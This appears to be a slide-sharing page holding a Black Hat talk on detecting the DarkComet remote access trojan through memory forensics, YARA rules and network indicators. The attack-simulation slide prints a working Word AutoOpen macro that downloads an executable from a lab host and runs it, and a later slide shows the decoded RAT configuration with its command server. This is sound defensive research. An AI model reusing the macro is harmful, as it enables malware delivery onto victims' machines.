Upload
tyler-halfpop
View
133
Download
13
Embed Size (px)
Citation preview
DarkCometBlackhat
Tyler Halfpop, Fidelis Cybersecurity
$ whoami
• Threat Researcher for Fidelis CyberSecurity• Working on doctorate in computer science• SANS Lethal Forensicator• CISSP, GREM• Site: tylerhalfpop.com | Twitter: @tylerhalfpop
About This Talk
• DarkComet at 100mph• What?• How?• Response
DarkComet About Screen
DarkComet About
Names: DarkComet, DarkKomet, Fynlos, FynloskiFully featured RAT written in Delphi
Attack Simulation
Word Doc with Macro
Sub AutoOpen()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")xHttp.Open "GET", "http://192.168.66.254/bad.exe", FalsexHttp.Send
With bStrm .Type = 1 .Open .write xHttp.responseBody .savetofile "bad.exe", 2End With
Shell ("bad.exe")
End Sub
Attack Simulation Build Video
• Build the downloader• Build the DarkComet implant• Setup the Client Listener
Attack Simulation Video
• Victim opens the word document• Downloads and executes the downloader• Downloader downloads and executes the DarkComet RAT• RAT controller has full control of the victim system
Memory Forensics with Volatility
python vol.py -f /vt/demo/WIN-JN4BO8C9KHA-20150401-214850.raw --profile=Win7SP1x86 psxviewVolatility Foundation Volatility Framework 2.4Offset(P) Name PID pslist psscan thrdproc pspcid csrss session deskthrd ---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- 0x3fd6ca58 svchost.exe 3348 True True True True True True True 0x3e659030 OSPPSVC.EXE 4060 True True True True True True True 0x3fa5f488 DumpIt.exe 2888 True True True True True True True 0x3e8db030 lsass.exe 496 True True True True True True False 0x3e6ea030 vmtoolsd.exe 1536 True True True True True True True 0x3fdba8a8 sppsvc.exe 3304 True True True True True True True 0x3e6670f0 spoolsv.exe 1284 True True True True True True True 0x3e8dc9b0 lsm.exe 504 True True True True True True False 0x3e963688 svchost.exe 616 True True True True True True True 0x3e475d40 conhost.exe 708 True True True True True True True 0x3e8a4848 winlogon.exe 428 True True True True True True True 0x3fa51030 msdcsc.exe 3384 True True True True True True True 0x3e473a78 TPAutoConnect. 644 True True True True True True True 0x3f27fd40 csrss.exe 392 True True True True False True True 0x3f264030 csrss.exe 344 True True True True False True True 0x3f2f2d40 smss.exe 252 True True True True False False False 0x3fffa9e8 System 4 True True True True False False False
Memory Forensics with Volatility
python vol.py -f /vt/demo/WIN-JN4BO8C9KHA-20150401-214850.raw --profile=Win7SP1x86 memdump -p 3384 --dump-dir /vt/demo/Volatility Foundation Volatility Framework 2.4************************************************************************Writing msdcsc.exe [ 3384] to 3384.dmp
Memory Forensics with Volatility
strings -a /vt/demo/3384.dmp | less…#BEGIN DARKCOMET DATA --MUTEX={DC_MUTEX-C8LPD3P}SID={Guest16}FWB={0}NETDATA={192.168.66.10:1604}GENCODE={U69tAi8fwsqT}INSTALL={1}COMBOPATH={7}EDTPATH={MSDCSC\msdcsc.exe}KEYNAME={MicroUpdate}EDTDATE={16/04/2007}PERSINST={0}MELT={0}CHANGEDATE={0}DIRATTRIB={0}FILEATTRIB={0}FAKEMSG={1}MSGTITLE={Don't Worry}MSGCORE={49742773206E6F2070726F626C656D210D0A}MSGICON={64}OFFLINEK={1}#EOF DARKCOMET DATA –…#KCMDDC51#-890
python -c "from Crypto.Cipher import ARC4; print ARC4.new(\"#KCMDDC51#-890\").decrypt(\"BF7CAB464EFB\".decode('hex'))"
IDTYPE
Host Detections
Default Mutex: DC_MUTEX-[A-Z0-9]{7}Default Dropped File: *\MSDCSC\msdcsc.exeKeylog Files: %TMP%/dclogs/YYYY-MM-DD-#.dc
Registry Persistence: HKCU/Software/Microsoft/Windows/CurrentVersion/Run/HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Hidden iexplorer.exe processes with no visible parent processHost file changes
5.4 Legacy Server Module has a visible GUI and system tray icon
Yara Rules
rule DarkComet{
meta:description = "DarkComet RAT"author = "Fidelis Cybersecurity"date = "2015-07-22"
strings:$s1 = "#KCMDDC"$s2 = "DCDATA"$s3 = "#BOT#CloseServer"$s4 = "#BOT#SvrUninstall"$s5 = "#BOT#URLDownload"
condition:uint16(0) == 0x5a4d and filesize < 50MB and all of ($s*)
}rule DarkCometDownloader {
meta:description = "DarkComet RAT"author = "Fidelis Cybersecurity"date = "2015-07-22"
strings:$s1 =
{6A00FF15F0304000A30D1040006A0A68261040006A00FF15F4304000A311104000FF35111040006A00FF15F8304000A315104000FF35111040006A00FF15FC304000A319104000FF3515104000FF1500314000A31D104000FF3519104000FF351D104000682C114000FF1508314000FF3515104000FF150C31400031C0682C104000682C104000FF15143140006805104000682C104000FF1510314000682C104000FF15183140006A006A00682C104000682C1140006A00FF15803040006A056A006A00682C10400068001040006A00FF15A83040006A00FF1504314000}
condition:uint16(0) == 0x5a4d and filesize < 10KB and all of them
}
Network Detections
Default Port: 1604 TCPDynamic DNS: No-IP.comDefault Banners:
8EA4AB05FA7EB47CB892B702C7CF9C7CD932155CAD31A61F1164805C82EEBF7CAB464EFB
Check for regular beaconing and inspect FTP Traffic because the keylogger can be configured to deliver data over FTP.
QUESTIONS?THANK YOU
@tylerhalfpop tylerhalfpop.com | @FidSecSys fidelissecurity.com